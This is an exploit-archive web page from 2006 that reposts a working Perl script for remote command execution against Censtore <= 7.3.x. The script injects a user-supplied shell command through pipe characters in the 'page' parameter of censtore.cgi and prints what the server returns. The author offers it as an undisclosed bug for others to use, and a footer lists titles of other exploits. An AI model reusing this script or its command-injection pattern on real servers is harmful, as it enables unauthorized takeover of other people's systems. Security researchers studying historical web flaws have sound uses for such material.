exploits , vulnerabilities , articles , Censtore <= 7.3.x (censtore.cgi) Remote Command Execution Exploit

2006-04-13

Censtore <= 7.3.x (censtore.cgi) Remote Command Execution Exploit

Rated as : High Risk

#!/usr/bin/perl
#
#  Censtore.cgi exploit by FOX_MULDER (fox_mulder@abv.bg)
#
#  Vulnerability foud by FOX_MULDER.
#
#  This is the first exploit i release and the bug is not public so
enjoy.
#  Ask http://censtore.com/ what they think about it !!!  
#
###########################

use IO::Socket;
use LWP::Simple; 

sub Usage {
print STDERR "\nFOX_MULDER DID IT AGAIN !!!\n";
print STDERR "Usage:\ncenex.pl <www.example.com> </path/>
\"cmd\"\n";
exit;
}

if (@ARGV < 3)
{
 Usage();
}


$host = @ARGV[0];
$path = @ARGV[1];
$command = @ARGV[2];
print "\n\n !!! ULTRA PRIVATE EDITION !!! \n\n";
print "censtore.cgi Remote Command Execution Exploit by
FOX_MULDER\n";

print "\n[+] Conecting to $host\n";

my $result =
get("http://$host$path/censtore.cgi?page=|$command|"); 

if (defined $result) { 
print $result; 
} 
else { 
print "Error with request.\n"; 
}
securitydot.net - 2006-04-13

Exploits - newest 10 RSS | More

2007-06-15 37773 Hits XOOPS Module Cjay Content 3 Remote File Inclusion Vulnerability
2007-06-15 19606 Hits XOOPS Module XT-Conteudo (spaw_root) RFI Vulnerability
2007-06-15 23324 Hits XOOPS Module XFsection (modify.php) Remote File Inclusion Vulnerability
2007-06-15 19651 Hits Microsoft Office MSODataSourceControl COM-object BoF PoC (0day)
2007-06-13 12063 Hits Microsoft Speech API ActiveX control Remote BoF Exploit (xp sp2)
2007-06-13 10258 Hits Microsoft Speech API ActiveX control Remote BoF Exploit (win2k sp4)
2007-06-13 12460 Hits Safari 3 for Windows Beta Remote Command Execution PoC
2007-06-13 10335 Hits Ace-FTP Client 1.24a Remote Buffer Overflow PoC
2007-06-09 22284 Hits MoviePlay 4.76 .lst File Local Buffer Overflow Exploit
2007-06-09 10830 Hits e-Vision CMS <= 2.02 SQL Injection/Remote Code Execution Exploit